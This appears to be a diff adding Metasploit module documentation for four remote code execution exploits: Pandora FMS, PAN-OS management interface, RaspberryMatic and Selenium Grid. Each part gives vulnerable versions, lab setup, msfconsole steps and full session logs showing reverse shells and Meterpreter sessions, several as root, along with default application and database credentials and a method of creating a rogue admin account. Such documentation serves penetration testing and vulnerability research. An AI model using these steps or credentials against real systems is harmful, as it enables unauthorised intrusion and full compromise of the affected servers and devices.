+* Pandora FMS Community Edition v7.0NG.718 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.724 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.725 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.738 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.739 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.759 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.767 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.768 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.777-LTS (Ubuntu 22.04)
+* Pandora FMS Community Edition v7.0NG.772-LTS (Ubuntu 22.04)
+
+## Installation steps to install Pandora FMS Community, Free or Enterprise Editions
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download [Pandora FMS iso](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/).
+* Install the iso image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options.
+* Boot up the VM and should be able to access the Pandora FMS appliance either thru the console, `ssh` on port `22`
+* or via the `webui` via `http://your_ip/pandora_console/index.php`.
+
+* Note: from version `v7.0NG.760` follow the installation manual below:
+* [Non ISO installation](https://pandorafms.com/manual/!current/en/documentation/pandorafms/installation/01_installing).
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/linux/http/pandora_fms_auth_rce_cve_2024_12971`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command, 2=Tiny Reverse Netcat Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### USERNAME
+This option is optional and is the username (default: admin) to authenticate with the Pandora FMS application.
+
+### PASSWORD
+This option is optional and is the password (default: pandora) in plain text to authenticate with the Pandora FMS application.
+
+### DB_USER
+This option is required and is the username (default: pandora) to authenticate with the Pandora FMS MySQL database.
+
+### DB_PASSWORD
+This option is required and is the password (default: Pandor4!) in plain text to authenticate with the Pandora FMS MySQL database.
+Note: In older versions, this password is set to `pandora` during installation of the application.
+
+### DB_PORT
+This option is required and is the MySQL database port (default: 3306) to connect to the database.
+
+## Scenarios
+### Pandora FMS v7.0NG.777 on Ubuntu 22.04 -  PHP Command target
+Attack scenario: use the default admin credentials (admin:pandora) of the Pandora FMS application
+to gain the privileges for the RCE.
+```msf
+msf6 > use exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Found chromium_path RCE. Pandora FMS version v7.0NG.777
+[*] Trying to log in with admin credentials admin:pandora at the Pandora FMS Web application.
+[*] Succesfully authenticated at the Pandora FMS Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing PHP Command for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.6
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:51714) at 2025-04-05 11:30:11 +0000
+[+] Payload is successful removed from chromium_path path configuration.
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > pwd
+/var/www/html/pandora_console
+meterpreter >
+```
+###  Pandora FMS v7.0NG.777 on Ubuntu 22.04 - Unix/Linux Command target
+Attack scenario: use the default database credentials (pandora:Pandor4!) to create an admin user in the application
+to gain the privileges for the RCE.
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > set target 1
+target => 1
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > set password xxx
+password => xxx
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Found chromium_path RCE. Pandora FMS version v7.0NG.777
+[*] Trying to log in with admin credentials admin:xxx at the Pandora FMS Web application.
+[*] Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.
+[*] Creating new admin user with credentials 39mqge:nmC9AuEJ5M for access at the Pandora FMS Web application.
+[*] Trying to log in with new admin credentials 39mqge:nmC9AuEJ5M at the Pandora FMS Web application.
+[*] Succesfully authenticated at the Pandora FMS Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 192.168.201.6
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.6:48916) at 2025-04-05 11:33:09 +0000
+[+] Payload is successful removed from chromium_path path configuration.
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 192.168.201.6
+OS           : Ubuntu 22.04 (Linux 5.15.0-126-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/var/www/html/pandora_console
+meterpreter >
+```
+###  Pandora FMS v7.0NG.738 on CentOS 7 - Tiny Netcat Command
+Attack scenario: use the payload less then 100 bytes to achieve the RCE.
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > set password pandora
+password => pandora
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > set target 2
+target => 2
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_12971) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Found phantomjs_bin RCE. Pandora FMS version v7.0NG.738
+[*] Trying to log in with admin credentials admin:pandora at the Pandora FMS Web application.
+[*] Succesfully authenticated at the Pandora FMS Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing Tiny Reverse Netcat Command (use THIS for versions <= v738) for cmd/unix/reverse_netcat_gaping
+[*] Command shell session 3 opened (192.168.201.8:4444 -> 192.168.201.6:52784) at 2025-04-05 11:38:47 +0000
+[+] Payload is successful removed from phantomjs_bin path configuration.
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache)
+uname -a
+Linux localhost.localdomain 3.10.0-957.5.1.el7.x86_64 #1 SMP Fri Feb 1 14:54:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/var/www/html/pandora_console
+```
+
+## Limitations
+In older versions of Pandora FMS, you might run into error 'Unable to login from this host due to policy' if you try to connect
+to the MySQL database with the default database credentials.
+This is caused by the restrictive host settings at the MySQL database which is default set to `localhost` and `127.0.0.1`.
+You can check this with the SQL command below if you have local access to the database.
+```
+SELECT host FROM mysql.user WHERE user = "pandora";
+-----------+
+| host      |
+-----------+
+| 127.0.0.1 |
+| localhost |
+-----------+
+```
+In newer versions of Pandora FMS, this has been changed to '%' which allow any host to connect to the database.
+Another restriction is the payload size for versions <= v7.0NG.738 where the payload size is restricted to a maximum
+of 100 bytes. Please use the `Tiny Netcat Command` option get a reverse shell.
@@ -0,0 +1,113 @@
+## Vulnerable Application
+This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection
+vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can
+execute arbitrary code with root privileges.
+
+The following versions are affected:
+  * PAN-OS 11.2 (up to and including 11.2.4-h1)
+  * PAN-OS 11.1 (up to and including 11.1.5-h1)
+  * PAN-OS 11.0 (up to and including 11.0.6-h1)
+  * PAN-OS 10.2 (up to and including 10.2.12-h2)
+
+## Testing
+Install a new PAN-OS instance as a VM in VMWare, by downloading an OVA for a vulnerable version, for example
+`PA-VM-ESX-11.1.4.ova`. Install this OVA in VMWare Workstation and boot the device. The first ethernet adapter
+will be assigned an IP address via DHCP. This is the IP address of the management interface. You can complete setup
+by visiting `https://MANAGEMENT_IP/` in your browser. You do not need to license the target VM in order to successfully
+run the exploit against the target. The default user is `admin` with a password of `admin`, and you will be instructed
+to change this upon logging in for the first time.
+
+The exploit has been tested against PAN-OS `10.2.8` and `11.1.4`, with the
+payloads `cmd/linux/http/x64/meterpreter_reverse_tcp`, `md/linux/http/x64/meterpreter/reverse_tcp`,
+and `cmd/unix/reverse_bash`.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/panos_management_unauth_rce`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+5. `set LPORT 4444`
+6. `check`
+7. `exploit`
+
+## Options
+
+### WRITABLE_DIR
+The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
+payload as a series of chunks to this location, before executing the payload. The written artifacts are then deleted.
+
+## Scenarios
+
+### Default
+
+```
+msf6 exploit(linux/http/panos_management_unauth_rce) > show options
+
+Module options (exploit/linux/http/panos_management_unauth_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.86.100   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         443              yes       The target port (TCP)
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                          no        HTTP server virtual host
+   WRITABLE_DIR  /var/tmp         yes       The full path of a writable directory on the target.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      pHLZiKRnmfR      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/panos_management_unauth_rce) > check
+[+] 192.168.86.100:443 - The target is vulnerable.
+msf6 exploit(linux/http/panos_management_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Uploading payload chunk 1 of 7...
+[*] Uploading payload chunk 2 of 7...
+[*] Uploading payload chunk 3 of 7...
+[*] Uploading payload chunk 4 of 7...
+[*] Uploading payload chunk 5 of 7...
+[*] Uploading payload chunk 6 of 7...
+[*] Uploading payload chunk 7 of 7...
+[*] Amalgamating payload chunks...
+[*] Executing payload...
+[*] Sending stage (3045380 bytes) to 192.168.86.100
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.100
+OS           : Red Hat  (Linux 4.18.0-240.1.1.28.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+RaspberryMatic / OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within
+the Java based HMIPServer.jar component. The webui allows for Firmware uploads which can be reached through the URL
+`/pages/jpages/system/DeviceFirmware/addFirmware`.
+This allows an unauthenticated attacker to upload a malicious .tgz archive to the server, which will be automatically
+extracted without any further checks. As this entry can contain ../sequences, it is possible to break out of the predefined
+temp directory and write files to other locations outside this path.
+
+This vulnerability is commonly known as the Zip Slip vulnerability and can be used to overwrite arbitrary files on the main
+filesystem. It is therefore possible to overwrite the watchdog script with a malicious payload in `/usr/local/addons/mediola/bin/`,
+which will be executed every five minutes through a cron job where attackers can gain remote code execution as root user,
+allowing a full system compromise.
+
+RaspberryMatic versions <= `3.73.9.20240130` are vulnerable.
+
+The following releases were tested.
+
+**RaspberryMatic Releases:**
+* RaspberryMatic v3.73.9 (OVA image)
+* RaspberryMatic v3.65.8 (Raspberry Pi4 Model B image)
+
+## Installation steps to install RaspberryMatic OVA image
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download [RaspberryMatic OVA](https://github.com/jens-maus/RaspberryMatic/releases/tag/3.73.9.20240130).
+* Install the OVA image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options via the `webui`.
+* Boot up the VM and should be able to access the RaspberryMatic appliance via the `webui` via `http://your_ip/`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options defined.
+
+## Scenarios
+### RaspberryMatic OVA appliance - Unix/Linux Command x64 target
+```msf
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set FETCH_SRVHOST 192.168.201.8
+FETCH_SRVHOST => 192.168.201.8
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set FETCH_WRITABLE_DIR /tmp
+FETCH_WRITABLE_DIR => /tmp
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. RaspberryMatic 3.73.9
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Uploading sT2s4fChKUZ.tgz
+[*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
+[*] Sending stage (3045380 bytes) to 192.168.201.6
+[*] Restoring original watchdog script.
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:51220) at 2025-01-28 18:00:01 +0000
+
+meterpreter > sysinfo
+Computer     : 192.168.201.6
+OS           :  (Linux 6.1.74)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/root
+meterpreter >
+```
+### RaspberryMatic Pi4 Model B compute board - Unix/Linux Command aarch64 target
+```msf
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set payload cmd/linux/http/aarch64/meterpreter_reverse_tcp
+payload => cmd/linux/http/aarch64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.10
+rhosts => 192.168.201.10
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.10:443 can be exploited.
+[+] The target appears to be vulnerable. RaspberryMatic 3.65.8
+[*] Executing Unix/Linux Command for cmd/linux/http/aarch64/meterpreter_reverse_tcp
+[*] Uploading 8emVtVt6U.tgz
+[*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
+[*] Restoring original watchdog script.
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:40324) at 2025-02-03 17:40:01 +0000
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           :  (Linux 5.15.56)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/root
+meterpreter >
+```
+## Limitations
+You have to wait maximum five minutes for a session to allow `cron` to run the malicious watchdog script
+containing the payload. Just be patient and wait for the magic to happen ;-)
+Another limitation is that the root filesystem on RaspberyMatic image is mounted read-only, so you need to set the
+option `FETCH_WRITABLE_DIR` to `/tmp` (this is mounted RW) otherwise the exploit will fail.
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
+such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
+
+The vulnerability affects:
+
+    * Selenium Server (Grid) before 4.0.0-alpha-7
+
+This module was successfully tested on:
+
+    * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+
+
+### Installation
+
+1. `docker pull selenium/standalone-chrome:3.141.59`
+
+2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+### selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04
+```
+msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > options
+
+Module options (exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    4444             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      OmbNmrIU         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40990) at 2024-12-30 13:33:31 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.5
+OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+```
+msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:34888) at 2024-12-30 13:34:30 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.6
+OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
--- a/Show More
+++ b/Show More